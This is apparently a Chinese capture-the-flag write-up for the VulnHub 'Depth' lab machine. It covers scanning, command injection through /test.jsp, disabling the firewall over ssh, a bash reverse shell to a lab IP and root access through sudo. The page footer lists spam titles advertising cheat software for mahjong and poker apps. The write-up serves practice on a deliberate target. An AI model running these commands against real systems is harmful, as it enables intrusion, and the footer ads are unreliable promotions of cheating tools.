【vulnhub】Depth靶机
创始人
2024-11-13 03:41:18
0

靶机安装

下载地址:https://download.vulnhub.com/depth/DepthB2R.ova

运行环境:VMware运行该虚拟机

信息收集

靶机IP发现

nmap 192.168.93.0/24

端口扫描

nmap -A 192.168.93.154 -p-

只开起了8080端口

进行目录扫描8080端口

dirsearch -u http://192.168.93.154:8080

有一个目录/test.jsp

IP网址访问

翻译过后为

后面拼接/test.jsp

翻译过后

提示我们输入 ls -l /tmp 测试一下

存在系统命令执行漏洞,进行利用,反弹shell尝试失败

漏洞利用

ls -l /home 查看到home目录内容,发现bill用户

输入ps aux,找出带有 “ps aux”的正在运行的进程,选项“ aux ”会打印系统中所有正在运行的进程。我们发现 sshd 服务正在使用中,但访问可能受到限制,nmap刚刚没有扫描出ssh的端口,可能存在防火墙。

尝试关闭防火墙

#尝试关闭防火墙 ssh bill@localhost sudo ufw disable

再次执行反弹shell

ssh bill@localhost bash -i >& /dev/tcp/192.168.93.130/8787 0>&1

获取shell成功

提权

尝试sudo提权

sudo -l,发现所有用户(ALL)都有sudo权限,

直接 sudo su 命令

查看flag文件

上一篇:鸿蒙(HarmonyOS)项目方舟框架(ArkUI)之RichText组件

下一篇:两分钟了解!wpk透视软件网站(透视)wepoker确实有挂(有挂指点)

相关内容

热门资讯

终于懂了!星悦麻将有后台操作吗... 终于懂了!星悦麻将有后台操作吗(辅助)竟然是有挂(2021已更新)(哔哩哔哩);1、实时星悦麻将有后...
让我来分享经验!潮汕闲来麻将a... 让我来分享经验!潮汕闲来麻将app有挂吗(透明挂)透明挂透视辅助工具(2021已更新)(哔哩哔哩)1...
七分钟辅助挂!江西中至麻将神器... 七分钟辅助挂!江西中至麻将神器软件,来玩app总是真的是有挂,黑科技教程(有挂脚本)1、游戏颠覆性的...
技术分享!吉祥麻将免输神器下载... 技术分享!吉祥麻将免输神器下载(辅助挂)外挂透视辅助神器(2022已更新)(哔哩哔哩)1、在吉祥麻将...
必备科技!博雅红河棋牌有没有挂... 必备科技!博雅红河棋牌有没有挂(辅助挂)都是存在有挂(2020已更新)(哔哩哔哩)1、很好的工具软件...
十分钟普及!哈局十三张,来玩德... 十分钟普及!哈局十三张,来玩德州好像真的有挂,2025新版总结(有挂攻略)1)哈局十三张辅助挂:进一...
必备教程!乐乐四川麻将助赢神器... 必备教程!乐乐四川麻将助赢神器购买(透视)外挂透明挂辅助工具(2022已更新)(哔哩哔哩);1、让任...
必备教程!乐清麻将花到底有没有... 必备教程!乐清麻将花到底有没有挂(透视)原来是有挂(2026已更新)(哔哩哔哩);1、不需要AI权限...
八分钟了解!吉安麻将73棋牌有... 八分钟了解!吉安麻将73棋牌有挂嘛,菠萝德州app好像是真的有挂,2025新版教程(有挂科普);1、...
推荐一款!!雀神小程序除了微信... 推荐一款!!雀神小程序除了微信哪有(透视辅助)外挂透明挂辅助脚本(2020已更新)(哔哩哔哩)推荐一...